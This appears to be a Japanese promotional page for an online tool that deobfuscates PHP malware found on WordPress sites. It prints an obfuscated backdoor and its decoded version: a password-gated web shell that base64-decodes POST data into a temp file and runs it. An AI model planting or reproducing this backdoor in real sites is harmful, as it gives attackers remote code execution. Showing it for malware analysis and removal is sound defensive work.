Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php function zexit_init() { $i="i";$m="m".chr(100).chr(53);if(isset($_POST[$i])){if($_POST[$i]==$m($m($i))){echo $m($i);die();}if($m($m($_POST[$i]))==="ee7498".chr(102).chr(54).chr(51).chr(53).chr(52).chr(53).chr(49).chr(100).chr(53).chr(101).chr(49).chr(50).chr(48).chr(57).chr(55).chr(52).chr(102).chr(54).chr(48).chr(100).chr(102).chr(51)."2478"){$f=sys_get_temp_dir().chr(47).$i;$b=chr(98).chr(97).chr(115).chr(101).chr(54)."4".chr(95).chr(100).chr(101).chr(99).chr(111)."de";file_put_contents($f,"<".chr(63).chr(112).chr(104)."p ".$b($_POST[$i.$i]));@include($f);@unlink($f);}} }
<?php function zexit_init() { $i = "i"; $m = "md5"; if (isset($_POST[$i])) { if ($_POST[$i] == md5(md5($i))) { echo md5($i); die; } if ($m($m($_POST[$i])) === "ee7498f635451d5e120974f60df32478") { $f = sys_get_temp_dir() . "/" . $i; $b = "base64_decode"; file_put_contents($f, "<?php " . base64_decode($_POST[$i . $i])); @(include $f); @unlink($f); } } }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.